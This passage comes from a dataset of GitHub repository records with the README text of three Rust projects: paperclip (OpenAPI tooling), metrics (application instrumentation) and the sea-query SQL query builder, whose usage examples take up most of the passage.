"gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "paperclip-rs/paperclip", "link": "https://github.com/paperclip-rs/paperclip", "tags": ["hacktoberfest", "openapi", "rust"], "stars": 695, "description": "WIP OpenAPI tooling for Rust.", "lang": "Rust", "repo_lang": "", "readme": "# Paperclip\n\n![Build Status](https://github.com/paperclip-rs/paperclip/actions/workflows/cicd.yml/badge.svg)\n![Linter Status](https://github.com/paperclip-rs/paperclip/actions/workflows/linter.yml/badge.svg)\n[![Usage docs](https://img.shields.io/badge/quickstart-blue.svg)](https://paperclip-rs.github.io/paperclip)\n[![API docs](https://img.shields.io/badge/docs-latest-blue.svg)](https://paperclip-rs.github.io/paperclip/paperclip)\n[![Crates.io](https://img.shields.io/crates/v/paperclip.svg)](https://crates.io/crates/paperclip)\n\nPaperclip offers tooling for the [OpenAPI specification](https://github.com/OAI/OpenAPI-Specification/). Once complete, it will provide:
\n\n- Code generation for efficient, type-safe, compile-time checked HTTP APIs (server, client and CLI) in Rust.\n- Support for processing, validating and hosting OpenAPI specs.\n- Customization for spec and code generation.\n\nIt's currently under active development and may not be ready for production use just yet.\n\nYou may be interested in:\n\n - [Examples and Usage](https://paperclip-rs.github.io/paperclip).\n - [Features being worked on](https://github.com/paperclip-rs/paperclip/projects).\n - [API documentation](https://paperclip-rs.github.io/paperclip/paperclip).\n\n## Developing locally\n\n - Make sure you have [`rustup`](https://rustup.rs/) installed. `cd` into this repository and run `make prepare` to set up your environment.\n - Now run `make` to build and run the tests.\n\n## Contributing\n\nThis project welcomes all kinds of contributions. No contribution is too small!\n\nIf you want to contribute to this project but don't know how to begin, or if you need help with something related to this project, feel free to send me an email (in my GitHub profile) or join the [Discord server](https://discord.gg/PPu4Dhj).\n\n## Code of Conduct\n\nThis project follows the [Rust Code of Conduct](https://www.rust-lang.org/policies/code-of-conduct).\n\n## License\n\nLicensed under either of\n\n- Apache License, Version 2.0 ([LICENSE-APACHE](LICENSE-APACHE) or http://www.apache.org/licenses/LICENSE-2.0)\n- MIT license ([LICENSE-MIT](LICENSE-MIT) or http://opensource.org/licenses/MIT)\n\nat your option.\n\n## Sponsors\n\nFolks who have sponsored the development of this project:\n
\n\n## FAQ\n\n> Why is this generating raw Rust code instead of leveraging [procedural macros](https://doc.rust-lang.org/reference/procedural-macros.html) for compile-time codegen?\n\nI don't think proc macros are the right way to go for REST APIs. We need to be able to **see** the generated code somehow to identify names, fields, supported methods, etc. With proc macros, you sorta have to guess.\n\nThis doesn't mean you can't generate APIs at compile time. The only difference is that you'll be using [build scripts](https://paperclip-rs.github.io/paperclip/build-script.html) instead and `include!`-ing the relevant code. That said, [we're using proc-macros](./macros) for other things.\n\n> The error thrown at compile-time doesn't look like it's very useful. Isn't there a better way to do this?\n\nNone that I can think of, sadly.\n\n**New ideas are needed here.**\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "metrics-rs/metrics", "link": "https://github.com/metrics-rs/metrics", "tags": ["rust-lang", "metrics", "telemetry"], "stars": 694, "description": "A metrics ecosystem for Rust.", "lang": "Rust", "repo_lang": "", "readme": "![Metrics - High-performance, protocol-agnostic instrumentation][splash]\n\n[splash]: https://raw.githubusercontent.com/metrics-rs/metrics/main/assets/splash.png\n\n[![Code of Conduct][conduct-badge]][conduct]\n[![MIT licensed][license-badge]](#license)\n[![Documentation][docs-badge]][docs]\n[![Discord chat][discord-badge]][discord]\n![last-commit-badge][]\n![contributors-badge][]\n\n[conduct-badge]: https://img.shields.io/badge/%E2%9D%A4-code%20of%20conduct-blue.svg\n[conduct]: https://github.com/metrics-rs/metrics/blob/master/CODE_OF_CONDUCT.md\n[license-badge]: https://img.shields.io/badge/license-MIT-blue\n[docs-badge]: https://docs.rs/metrics/badge.svg\n[docs]: https://docs.rs/metrics\n[discord-badge]: https://img.shields.io/discord/500028886025895936\n[discord]: https://discord.gg/eTwKyY9\n[last-commit-badge]: https://img.shields.io/github/last-commit/metrics-rs/metrics\n[contributors-badge]: https://img.shields.io/github/contributors/metrics-rs/metrics\n\n\n## code of conduct\n\n**NOTE**: All conversations and contributions to this project shall adhere to the [Code of Conduct][conduct].\n\n# what's it all about?\n\nRunning applications in production can be hard when you don't have insight into what the application is doing. We're lucky to have so many good system monitoring programs and services to show us how our servers are performing, but we still have to do the work of instrumenting our applications to gain deep insight into their behavior and performance.\n\n`metrics` makes it easy to instrument your application to provide real-time insight into what's happening. It provides a number of practical features that make it easy for library and application authors to start collecting and exporting metrics from their codebase.\n\n# why would I collect metrics?\n\nSome of the most common scenarios for collecting metrics from an application:\n- see how many times a codepath was hit\n- track the time it takes for a piece of code to execute\n- expose internal counters and values in a standardized way\n\nImportantly, this works for both library authors and application authors. If the libraries you use are instrumented, you unlock the power of being able to collect those metrics in your application for free, without any extra configuration.
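For example, a library might count how many times a codepath is hit and record how long the work takes. Below is a minimal sketch; the metric names are illustrative and the macro signatures follow the 0.20-era `metrics` API, so check the docs for the version you actually use:\n\n```rust\nuse std::time::Instant;\n\nuse metrics::{counter, histogram};\n\npub fn process_job() {\n    let start = Instant::now();\n\n    // ... the actual work being instrumented ...\n\n    // Count how many times this codepath was hit.\n    counter!(\"jobs_processed\", 1);\n\n    // Track how long the work took, in seconds.\n    histogram!(\"job_duration_seconds\", start.elapsed().as_secs_f64());\n}\n```\n\nBecause `metrics` is a facade like `log`, these calls are nearly free no-ops until the host application installs a recorder/exporter.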
Everyone wins, and learns more about their application performance at the end of the day.\n\n# project layout\n\nThe Metrics project provides a number of crates for both library and application authors.\n\nIf you're a library author, you'll only care about using [`metrics`][metrics] to instrument your library. If you're an application author, you'll likely also want to instrument your application, but you'll care about \"exporters\" as a means to take those metrics and ship them somewhere for analysis.\n\nOverall, this repository is home to the following crates:\n\n* [`metrics`][metrics]: A lightweight metrics facade, similar to [`log`][log].\n* [`metrics-macros`][metrics-macros]: Procedural macros that power `metrics`.\n* [`metrics-tracing-context`][metrics-tracing-context]: Allows capturing [`tracing`][tracing] span fields as metric labels.\n* [`metrics-exporter-tcp`][metrics-exporter-tcp]: A `metrics`-compatible exporter for serving metrics over TCP.\n* [`metrics-exporter-prometheus`][metrics-exporter-prometheus]: A `metrics`-compatible exporter for serving a Prometheus scrape endpoint.\n* [`metrics-util`][metrics-util]: Helper types/functions used by the `metrics` ecosystem.\n\n
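To actually ship these metrics somewhere, an application installs one of the exporters as its global recorder. A minimal sketch using the Prometheus exporter is shown below; the `app_started` name is illustrative and the builder options vary between versions, so consult the exporter's docs for yours:\n\n```rust\nuse metrics_exporter_prometheus::PrometheusBuilder;\n\nfn main() {\n    // Install the Prometheus recorder globally and serve a scrape endpoint.\n    // Note: depending on the exporter version this may require (or spawn) a\n    // Tokio runtime; see the metrics-exporter-prometheus documentation.\n    PrometheusBuilder::new()\n        .install()\n        .expect(\"failed to install Prometheus exporter\");\n\n    // Every metric emitted from here on is visible to the scrape endpoint.\n    metrics::counter!(\"app_started\", 1);\n}\n```\n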
# community integrations\n\nThere are also some community-maintained exporters and other integrations:\n\n* [`metrics-exporter-statsd`][metrics-exporter-statsd]: A `metrics`-compatible exporter for sending metrics via StatsD.\n* [`metrics-exporter-newrelic`][metrics-exporter-newrelic]: A `metrics`-compatible exporter for sending metrics to New Relic.\n* [`opinionated_metrics`][opinionated-metrics]: An opinionated interface for emitting metrics from CLI/server applications, based on `metrics`.\n\n## MSRV\n\nThe Minimum Supported Rust Version is **1.56.1**.\nIt is enforced in CI.\n\n### policy for bumping MSRV\n\n* The last 4 stable releases must always be supported\n* The goal is to try and support older versions where possible (not opting in to newer versions just to use a new helper method on standard library types, etc.)\n* Do not bump the MSRV for newer versions of dependencies in core crates (metrics and metrics-util)\n\n# contributing\n\nTo those of you who have already contributed to `metrics` in some way, shape, or form: **a big, and continued, \"thank you!\"** \u2764\ufe0f\n\nTo everyone else that we haven't had the pleasure of interacting with: we're always looking for thoughts on how to make `metrics` better, or users with interesting use cases. Of course, we're also happy to accept code contributions for outstanding feature requests directly. \ud83d\ude00\n\nWe'd love to chat about any of the above, or anything else related to metrics. Don't hesitate to file an issue on the repository, or come and chat with us over on [Discord](https://discord.gg/eTwKyY9).\n\n[metrics]: https://github.com/metrics-rs/metrics/tree/main/metrics\n[metrics-macros]: https://github.com/metrics-rs/metrics/tree/main/metrics-macros\n[metrics-tracing-context]: https://github.com/metrics-rs/metrics/tree/main/metrics-tracing-context\n[metrics-exporter-tcp]: https://github.com/metrics-rs/metrics/tree/main/metrics-exporter-tcp\n[metrics-exporter-prometheus]: https://github.com/metrics-rs/metrics/tree/main/metrics-exporter-prometheus\n[metrics-util]: https://github.com/metrics-rs/metrics/tree/main/metrics-util\n[log]: https://docs.rs/log\n[tracing]: https://tracing.rs\n[metrics-exporter-statsd]: https://docs.rs/metrics-exporter-statsd\n[metrics-exporter-newrelic]: https://docs.rs/metrics-exporter-newrelic\n[opinionated-metrics]: https://docs.rs/opinionated_metrics\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "SeaQL/sea-query", "link": "https://github.com/SeaQL/sea-query", "tags": ["rust", "query-builder", "mysql", "postgresql", "sqlite", "sql", "database", "mariadb", "postgres", "sqlx", "rusqlite", "hacktoberfest"], "stars": 694, "description": "\ud83d\udd31 A dynamic SQL query builder for MySQL, Postgres and SQLite", "lang": "Rust", "repo_lang": "", "readme": "
\n\n  SeaQuery\n\n  \ud83d\udd31 A dynamic query builder for MySQL, Postgres and SQLite\n
\n\n [![crate](https://img.shields.io/crates/v/sea-query.svg)](https://crates.io/crates/sea-query)\n [![docs](https://docs.rs/sea-query/badge.svg)](https://docs.rs/sea-query)\n [![build status](https://github.com/SeaQL/sea-query/actions/workflows/rust.yml/badge.svg)](https://github.com/SeaQL/sea-query/actions/workflows/rust.yml)\n\n
\n\n## SeaQuery\n\nSeaQuery is a query builder to help you construct dynamic SQL queries in Rust.\nYou can construct expressions, queries and schema as abstract syntax trees using an ergonomic API.\nWe support MySQL, Postgres and SQLite behind a common interface that aligns their behaviour where appropriate.\n\nWe provide integration for [SQLx](https://crates.io/crates/sqlx),\n[postgres](https://crates.io/crates/postgres) and [rusqlite](https://crates.io/crates/rusqlite).\nSee [examples](https://github.com/SeaQL/sea-query/blob/master/examples) for usage.\n\nSeaQuery is the foundation of [SeaORM](https://github.com/SeaQL/sea-orm), an async & dynamic ORM for Rust.\n\n[![GitHub stars](https://img.shields.io/github/stars/SeaQL/sea-query.svg?style=social&label=Star&maxAge=1)](https://github.com/SeaQL/sea-query/stargazers/)\nIf you like what we do, consider starring, commenting, sharing and contributing!\n\n[![Discord](https://img.shields.io/discord/873880840487206962?label=Discord)](https://discord.com/invite/uCPdDXzbdv)\nJoin our Discord server to chat with others in the SeaQL community!\n\n## Install\n\n```toml\n# Cargo.toml\n[dependencies]\nsea-query = \"0\"\n```\n\nSeaQuery is very lightweight; all dependencies are optional.\n\n### Feature flags\n\nMacro: `derive` `attr`\n\nAsync support: `thread-safe` (use `Arc` in place of `Rc`)\n\nSQL engine: `backend-mysql`, `backend-postgres`, `backend-sqlite`\n\nType support: `with-chrono`, `with-time`, `with-json`, `with-rust_decimal`, `with-bigdecimal`, `with-uuid`,\n`with-ipnetwork`, `with-mac_address`, `postgres-array`, `postgres-interval`\n\n## Usage\n\nTable of Contents\n\n1. Basics\n\n 1. [Iden](#iden)\n 1. [Expression](#expression)\n 1. [Condition](#condition)\n 1. [Statement Builders](#statement-builders)\n\n1. Query Statement\n\n 1. [Query Select](#query-select)\n 1. [Query Insert](#query-insert)\n 1. [Query Update](#query-update)\n 1. [Query Delete](#query-delete)\n\n1. Advanced\n 1. [Aggregate Functions](#aggregate-functions)\n 1. [Casting](#casting)\n 1. [Custom Function](#custom-function)\n\n1. Schema Statement\n\n 1. [Table Create](#table-create)\n 1. [Table Alter](#table-alter)\n 1. [Table Drop](#table-drop)\n 1. [Table Rename](#table-rename)\n 1. [Table Truncate](#table-truncate)\n 1. [Foreign Key Create](#foreign-key-create)\n 1. [Foreign Key Drop](#foreign-key-drop)\n 1. [Index Create](#index-create)\n 1. [Index Drop](#index-drop)\n\n### Motivation\n\nWhy would you want to use a dynamic query builder?\n\n1. Parameter bindings\n\nOne of the headaches when using raw SQL is parameter binding. With SeaQuery you can:\n\n```rust\nassert_eq!(\n Query::select()\n .column(Glyph::Image)\n .from(Glyph::Table)\n .and_where(Expr::col(Glyph::Image).like(\"A\"))\n .and_where(Expr::col(Glyph::Id).is_in([1, 2, 3]))\n .build(PostgresQueryBuilder),\n (\n r#\"SELECT \"image\" FROM \"glyph\" WHERE \"image\" LIKE $1 AND \"id\" IN ($2, $3, $4)\"#\n .to_owned(),\n Values(vec![\n Value::String(Some(Box::new(\"A\".to_owned()))),\n Value::Int(Some(1)),\n Value::Int(Some(2)),\n Value::Int(Some(3))\n ])\n )\n);\n```\n\n2. 
Dynamic query\n\nYou can construct the query at runtime based on user inputs:\n\n```rust\nQuery::select()\n .column(Char::Character)\n .from(Char::Table)\n .conditions(\n // some runtime condition\n true,\n // if condition is true then add the following condition\n |q| {\n q.and_where(Expr::col(Char::Id).eq(1));\n },\n // otherwise leave it as is\n |q| {},\n );\n```\n\n### Iden\n\n`Iden` is a trait for identifiers used in any query statement.\n\nCommonly implemented by Enum where each Enum represents a table found in a database,\nand its variants include table name and column name.\n\n[`Iden::unquoted()`] must be implemented to provide a mapping between Enum variants and its\ncorresponding string value.\n\n```rust\nuse sea_query::*;\n\n// For example Character table with column id, character, font_size...\npub enum Character {\n Table,\n Id,\n FontId,\n FontSize,\n}\n\n// Mapping between Enum variant and its corresponding string value\nimpl Iden for Character {\n fn unquoted(&self, s: &mut dyn std::fmt::Write) {\n write!(\n s,\n \"{}\",\n match self {\n Self::Table => \"character\",\n Self::Id => \"id\",\n Self::FontId => \"font_id\",\n Self::FontSize => \"font_size\",\n }\n )\n .unwrap();\n }\n}\n```\n\nIf you're okay with running another procedural macro, you can activate\nthe `derive` or `attr` feature on the crate to save you some boilerplate.\nFor more usage information, look at\n[the derive examples](https://github.com/SeaQL/sea-query/tree/master/sea-query-derive/tests/pass)\nor [the attribute examples](https://github.com/SeaQL/sea-query/tree/master/sea-query-attr/tests/pass).\n\n```rust\n#[cfg(feature = \"derive\")]\nuse sea_query::Iden;\n\n// This will implement Iden exactly as shown above\n#[derive(Iden)]\nenum Character {\n Table,\n}\nassert_eq!(Character::Table.to_string(), \"character\");\n\n// You can also derive a unit struct\n#[derive(Iden)]\nstruct Glyph;\nassert_eq!(Glyph.to_string(), \"glyph\");\n```\n\n```rust\n#[cfg(feature = \"attr\")]\nuse sea_query::{enum_def, Iden};\n\n#[enum_def]\nstruct Character {\n pub foo: u64,\n}\n\n// It generates the following along with Iden impl\nenum CharacterIden {\n Table,\n Foo,\n}\n\nassert_eq!(CharacterIden::Table.to_string(), \"character\");\nassert_eq!(CharacterIden::Foo.to_string(), \"foo\");\n```\n\n\n### Expression\n\nUse [`Expr`] to construct select, join, where and having expression in query.\n\n```rust\nassert_eq!(\n Query::select()\n .column(Char::Character)\n .from(Char::Table)\n .and_where(\n Expr::expr(Expr::col(Char::SizeW).add(1))\n .mul(2)\n .eq(Expr::expr(Expr::col(Char::SizeH).div(2)).sub(1))\n )\n .and_where(\n Expr::col(Char::SizeW).in_subquery(\n Query::select()\n .expr(Expr::cust_with_values(\"ln($1 ^ $2)\", [2.4, 1.2]))\n .take()\n )\n )\n .and_where(\n Expr::col(Char::Character)\n .like(\"D\")\n .and(Expr::col(Char::Character).like(\"E\"))\n )\n .to_string(PostgresQueryBuilder),\n [\n r#\"SELECT \"character\" FROM \"character\"\"#,\n r#\"WHERE (\"size_w\" + 1) * 2 = (\"size_h\" / 2) - 1\"#,\n r#\"AND \"size_w\" IN (SELECT ln(2.4 ^ 1.2))\"#,\n r#\"AND ((\"character\" LIKE 'D') AND (\"character\" LIKE 'E'))\"#,\n ]\n .join(\" \")\n);\n```\n\n### Condition\n\nIf you have complex conditions to express, you can use the [`Condition`] builder,\nusable for [`ConditionalStatement::cond_where`] and [`SelectStatement::cond_having`].\n\n```rust\nassert_eq!(\n Query::select()\n .column(Glyph::Id)\n .from(Glyph::Table)\n .cond_where(\n Cond::any()\n .add(\n Cond::all()\n .add(Expr::col(Glyph::Aspect).is_null())\n 
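// within all(), conditions are joined with AND; the outer any() joins its groups with OR\n 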
.add(Expr::col(Glyph::Image).is_null())\n )\n .add(\n Cond::all()\n .add(Expr::col(Glyph::Aspect).is_in([3, 4]))\n .add(Expr::col(Glyph::Image).like(\"A%\"))\n )\n )\n .to_string(PostgresQueryBuilder),\n [\n r#\"SELECT \"id\" FROM \"glyph\"\"#,\n r#\"WHERE\"#,\n r#\"(\"aspect\" IS NULL AND \"image\" IS NULL)\"#,\n r#\"OR\"#,\n r#\"(\"aspect\" IN (3, 4) AND \"image\" LIKE 'A%')\"#,\n ]\n .join(\" \")\n);\n```\n\nThere is also the [`any!`] and [`all!`] macro at your convenience:\n\n```rust\nQuery::select().cond_where(any![\n Expr::col(Glyph::Aspect).is_in([3, 4]),\n all![\n Expr::col(Glyph::Aspect).is_null(),\n Expr::col(Glyph::Image).like(\"A%\")\n ]\n]);\n```\n\n### Statement Builders\n\nStatements are divided into 2 categories: Query and Schema, and to be serialized into SQL\nwith [`QueryStatementBuilder`] and [`SchemaStatementBuilder`] respectively.\n\nSchema statement has the following interface:\n\n```rust\nfn build(&self, schema_builder: T) -> String;\n```\n\nQuery statement has the following interfaces:\n\n```rust\nfn build(&self, query_builder: T) -> (String, Values);\n\nfn to_string(&self, query_builder: T) -> String;\n```\n\n`build` builds a SQL statement as string and parameters to be passed to the database driver\nthrough the binary protocol. This is the preferred way as it has less overhead and is more secure.\n\n`to_string` builds a SQL statement as string with parameters injected. This is good for testing\nand debugging.\n\n### Query Select\n\n```rust\nlet query = Query::select()\n .column(Char::Character)\n .column((Font::Table, Font::Name))\n .from(Char::Table)\n .left_join(Font::Table, Expr::col((Char::Table, Char::FontId)).equals((Font::Table, Font::Id)))\n .and_where(Expr::col(Char::SizeW).is_in([3, 4]))\n .and_where(Expr::col(Char::Character).like(\"A%\"))\n .to_owned();\n\nassert_eq!(\n query.to_string(MysqlQueryBuilder),\n r#\"SELECT `character`, `font`.`name` FROM `character` LEFT JOIN `font` ON `character`.`font_id` = `font`.`id` WHERE `size_w` IN (3, 4) AND `character` LIKE 'A%'\"#\n);\nassert_eq!(\n query.to_string(PostgresQueryBuilder),\n r#\"SELECT \"character\", \"font\".\"name\" FROM \"character\" LEFT JOIN \"font\" ON \"character\".\"font_id\" = \"font\".\"id\" WHERE \"size_w\" IN (3, 4) AND \"character\" LIKE 'A%'\"#\n);\nassert_eq!(\n query.to_string(SqliteQueryBuilder),\n r#\"SELECT \"character\", \"font\".\"name\" FROM \"character\" LEFT JOIN \"font\" ON \"character\".\"font_id\" = \"font\".\"id\" WHERE \"size_w\" IN (3, 4) AND \"character\" LIKE 'A%'\"#\n);\n```\n\n### Query Insert\n\n```rust\nlet query = Query::insert()\n .into_table(Glyph::Table)\n .columns([Glyph::Aspect, Glyph::Image])\n .values_panic([5.15.into(), \"12A\".into()])\n .values_panic([4.21.into(), \"123\".into()])\n .to_owned();\n\nassert_eq!(\n query.to_string(MysqlQueryBuilder),\n r#\"INSERT INTO `glyph` (`aspect`, `image`) VALUES (5.15, '12A'), (4.21, '123')\"#\n);\nassert_eq!(\n query.to_string(PostgresQueryBuilder),\n r#\"INSERT INTO \"glyph\" (\"aspect\", \"image\") VALUES (5.15, '12A'), (4.21, '123')\"#\n);\nassert_eq!(\n query.to_string(SqliteQueryBuilder),\n r#\"INSERT INTO \"glyph\" (\"aspect\", \"image\") VALUES (5.15, '12A'), (4.21, '123')\"#\n);\n```\n\n### Query Update\n\n```rust\nlet query = Query::update()\n .table(Glyph::Table)\n .values([(Glyph::Aspect, 1.23.into()), (Glyph::Image, \"123\".into())])\n .and_where(Expr::col(Glyph::Id).eq(1))\n .to_owned();\n\nassert_eq!(\n query.to_string(MysqlQueryBuilder),\n r#\"UPDATE `glyph` SET `aspect` = 1.23, `image` = '123' WHERE 
`id` = 1\"#\n);\nassert_eq!(\n query.to_string(PostgresQueryBuilder),\n r#\"UPDATE \"glyph\" SET \"aspect\" = 1.23, \"image\" = '123' WHERE \"id\" = 1\"#\n);\nassert_eq!(\n query.to_string(SqliteQueryBuilder),\n r#\"UPDATE \"glyph\" SET \"aspect\" = 1.23, \"image\" = '123' WHERE \"id\" = 1\"#\n);\n```\n\n### Query Delete\n\n```rust\nlet query = Query::delete()\n .from_table(Glyph::Table)\n .cond_where(\n Cond::any()\n .add(Expr::col(Glyph::Id).lt(1))\n .add(Expr::col(Glyph::Id).gt(10)),\n )\n .to_owned();\n\nassert_eq!(\n query.to_string(MysqlQueryBuilder),\n r#\"DELETE FROM `glyph` WHERE `id` < 1 OR `id` > 10\"#\n);\nassert_eq!(\n query.to_string(PostgresQueryBuilder),\n r#\"DELETE FROM \"glyph\" WHERE \"id\" < 1 OR \"id\" > 10\"#\n);\nassert_eq!(\n query.to_string(SqliteQueryBuilder),\n r#\"DELETE FROM \"glyph\" WHERE \"id\" < 1 OR \"id\" > 10\"#\n);\n```\n\n### Aggregate Functions\n\n`max`, `min`, `sum`, `avg`, `count` etc\n\n```rust\nlet query = Query::select()\n .expr(Func::sum(Expr::col((Char::Table, Char::SizeH))))\n .from(Char::Table)\n .to_owned();\nassert_eq!(\n query.to_string(MysqlQueryBuilder),\n r#\"SELECT SUM(`character`.`size_h`) FROM `character`\"#\n);\nassert_eq!(\n query.to_string(PostgresQueryBuilder),\n r#\"SELECT SUM(\"character\".\"size_h\") FROM \"character\"\"#\n);\nassert_eq!(\n query.to_string(SqliteQueryBuilder),\n r#\"SELECT SUM(\"character\".\"size_h\") FROM \"character\"\"#\n);\n```\n\n### Casting\n\n```rust\nlet query = Query::select()\n .expr(Func::cast_as(\"hello\", Alias::new(\"MyType\")))\n .to_owned();\n\nassert_eq!(\n query.to_string(MysqlQueryBuilder),\n r#\"SELECT CAST('hello' AS MyType)\"#\n);\nassert_eq!(\n query.to_string(PostgresQueryBuilder),\n r#\"SELECT CAST('hello' AS MyType)\"#\n);\nassert_eq!(\n query.to_string(SqliteQueryBuilder),\n r#\"SELECT CAST('hello' AS MyType)\"#\n);\n```\n\n### Custom Function\n\n```rust\nstruct MyFunction;\n\nimpl Iden for MyFunction {\n fn unquoted(&self, s: &mut dyn Write) {\n write!(s, \"MY_FUNCTION\").unwrap();\n }\n}\n\nlet query = Query::select()\n .expr(Func::cust(MyFunction).arg(Expr::val(\"hello\")))\n .to_owned();\n\nassert_eq!(\n query.to_string(MysqlQueryBuilder),\n r#\"SELECT MY_FUNCTION('hello')\"#\n);\nassert_eq!(\n query.to_string(PostgresQueryBuilder),\n r#\"SELECT MY_FUNCTION('hello')\"#\n);\nassert_eq!(\n query.to_string(SqliteQueryBuilder),\n r#\"SELECT MY_FUNCTION('hello')\"#\n);\n```\n\n### Table Create\n\n```rust\nlet table = Table::create()\n .table(Char::Table)\n .if_not_exists()\n .col(ColumnDef::new(Char::Id).integer().not_null().auto_increment().primary_key())\n .col(ColumnDef::new(Char::FontSize).integer().not_null())\n .col(ColumnDef::new(Char::Character).string().not_null())\n .col(ColumnDef::new(Char::SizeW).integer().not_null())\n .col(ColumnDef::new(Char::SizeH).integer().not_null())\n .col(ColumnDef::new(Char::FontId).integer().default(Value::Int(None)))\n .foreign_key(\n ForeignKey::create()\n .name(\"FK_2e303c3a712662f1fc2a4d0aad6\")\n .from(Char::Table, Char::FontId)\n .to(Font::Table, Font::Id)\n .on_delete(ForeignKeyAction::Cascade)\n .on_update(ForeignKeyAction::Cascade)\n )\n .to_owned();\n\nassert_eq!(\n table.to_string(MysqlQueryBuilder),\n [\n r#\"CREATE TABLE IF NOT EXISTS `character` (\"#,\n r#\"`id` int NOT NULL AUTO_INCREMENT PRIMARY KEY,\"#,\n r#\"`font_size` int NOT NULL,\"#,\n r#\"`character` varchar(255) NOT NULL,\"#,\n r#\"`size_w` int NOT NULL,\"#,\n r#\"`size_h` int NOT NULL,\"#,\n r#\"`font_id` int DEFAULT NULL,\"#,\n r#\"CONSTRAINT 
`FK_2e303c3a712662f1fc2a4d0aad6`\"#,\n r#\"FOREIGN KEY (`font_id`) REFERENCES `font` (`id`)\"#,\n r#\"ON DELETE CASCADE ON UPDATE CASCADE\"#,\n r#\")\"#,\n ].join(\" \")\n);\nassert_eq!(\n table.to_string(PostgresQueryBuilder),\n [\n r#\"CREATE TABLE IF NOT EXISTS \"character\" (\"#,\n r#\"\"id\" serial NOT NULL PRIMARY KEY,\"#,\n r#\"\"font_size\" integer NOT NULL,\"#,\n r#\"\"character\" varchar NOT NULL,\"#,\n r#\"\"size_w\" integer NOT NULL,\"#,\n r#\"\"size_h\" integer NOT NULL,\"#,\n r#\"\"font_id\" integer DEFAULT NULL,\"#,\n r#\"CONSTRAINT \"FK_2e303c3a712662f1fc2a4d0aad6\"\"#,\n r#\"FOREIGN KEY (\"font_id\") REFERENCES \"font\" (\"id\")\"#,\n r#\"ON DELETE CASCADE ON UPDATE CASCADE\"#,\n r#\")\"#,\n ].join(\" \")\n);\nassert_eq!(\n table.to_string(SqliteQueryBuilder),\n [\n r#\"CREATE TABLE IF NOT EXISTS \"character\" (\"#,\n r#\"\"id\" integer NOT NULL PRIMARY KEY AUTOINCREMENT,\"#,\n r#\"\"font_size\" integer NOT NULL,\"#,\n r#\"\"character\" text NOT NULL,\"#,\n r#\"\"size_w\" integer NOT NULL,\"#,\n r#\"\"size_h\" integer NOT NULL,\"#,\n r#\"\"font_id\" integer DEFAULT NULL,\"#,\n r#\"FOREIGN KEY (\"font_id\") REFERENCES \"font\" (\"id\") ON DELETE CASCADE ON UPDATE CASCADE\"#,\n r#\")\"#,\n ].join(\" \")\n);\n```\n\n### Table Alter\n\n```rust\nlet table = Table::alter()\n .table(Font::Table)\n .add_column(\n ColumnDef::new(Alias::new(\"new_col\"))\n .integer()\n .not_null()\n .default(100),\n )\n .to_owned();\n\nassert_eq!(\n table.to_string(MysqlQueryBuilder),\n r#\"ALTER TABLE `font` ADD COLUMN `new_col` int NOT NULL DEFAULT 100\"#\n);\nassert_eq!(\n table.to_string(PostgresQueryBuilder),\n r#\"ALTER TABLE \"font\" ADD COLUMN \"new_col\" integer NOT NULL DEFAULT 100\"#\n);\nassert_eq!(\n table.to_string(SqliteQueryBuilder),\n r#\"ALTER TABLE \"font\" ADD COLUMN \"new_col\" integer NOT NULL DEFAULT 100\"#,\n);\n```\n\n### Table Drop\n\n```rust\nlet table = Table::drop()\n .table(Glyph::Table)\n .table(Char::Table)\n .to_owned();\n\nassert_eq!(\n table.to_string(MysqlQueryBuilder),\n r#\"DROP TABLE `glyph`, `character`\"#\n);\nassert_eq!(\n table.to_string(PostgresQueryBuilder),\n r#\"DROP TABLE \"glyph\", \"character\"\"#\n);\nassert_eq!(\n table.to_string(SqliteQueryBuilder),\n r#\"DROP TABLE \"glyph\", \"character\"\"#\n);\n```\n\n### Table Rename\n\n```rust\nlet table = Table::rename()\n .table(Font::Table, Alias::new(\"font_new\"))\n .to_owned();\n\nassert_eq!(\n table.to_string(MysqlQueryBuilder),\n r#\"RENAME TABLE `font` TO `font_new`\"#\n);\nassert_eq!(\n table.to_string(PostgresQueryBuilder),\n r#\"ALTER TABLE \"font\" RENAME TO \"font_new\"\"#\n);\nassert_eq!(\n table.to_string(SqliteQueryBuilder),\n r#\"ALTER TABLE \"font\" RENAME TO \"font_new\"\"#\n);\n```\n\n### Table Truncate\n\n```rust\nlet table = Table::truncate().table(Font::Table).to_owned();\n\nassert_eq!(\n table.to_string(MysqlQueryBuilder),\n r#\"TRUNCATE TABLE `font`\"#\n);\nassert_eq!(\n table.to_string(PostgresQueryBuilder),\n r#\"TRUNCATE TABLE \"font\"\"#\n);\n// Sqlite does not support the TRUNCATE statement\n```\n\n### Foreign Key Create\n\n```rust\nlet foreign_key = ForeignKey::create()\n .name(\"FK_character_font\")\n .from(Char::Table, Char::FontId)\n .to(Font::Table, Font::Id)\n .on_delete(ForeignKeyAction::Cascade)\n .on_update(ForeignKeyAction::Cascade)\n .to_owned();\n\nassert_eq!(\n foreign_key.to_string(MysqlQueryBuilder),\n [\n r#\"ALTER TABLE `character`\"#,\n r#\"ADD CONSTRAINT `FK_character_font`\"#,\n r#\"FOREIGN KEY (`font_id`) REFERENCES `font` (`id`)\"#,\n r#\"ON DELETE CASCADE 
ON UPDATE CASCADE\"#,\n ]\n .join(\" \")\n);\nassert_eq!(\n foreign_key.to_string(PostgresQueryBuilder),\n [\n r#\"ALTER TABLE \"character\" ADD CONSTRAINT \"FK_character_font\"\"#,\n r#\"FOREIGN KEY (\"font_id\") REFERENCES \"font\" (\"id\")\"#,\n r#\"ON DELETE CASCADE ON UPDATE CASCADE\"#,\n ]\n .join(\" \")\n);\n// Sqlite does not support modification of foreign key constraints to existing tables\n```\n\n### Foreign Key Drop\n\n```rust\nlet foreign_key = ForeignKey::drop()\n .name(\"FK_character_font\")\n .table(Char::Table)\n .to_owned();\n\nassert_eq!(\n foreign_key.to_string(MysqlQueryBuilder),\n r#\"ALTER TABLE `character` DROP FOREIGN KEY `FK_character_font`\"#\n);\nassert_eq!(\n foreign_key.to_string(PostgresQueryBuilder),\n r#\"ALTER TABLE \"character\" DROP CONSTRAINT \"FK_character_font\"\"#\n);\n// Sqlite does not support modification of foreign key constraints to existing tables\n```\n\n### Index Create\n\n```rust\nlet index = Index::create()\n .name(\"idx-glyph-aspect\")\n .table(Glyph::Table)\n .col(Glyph::Aspect)\n 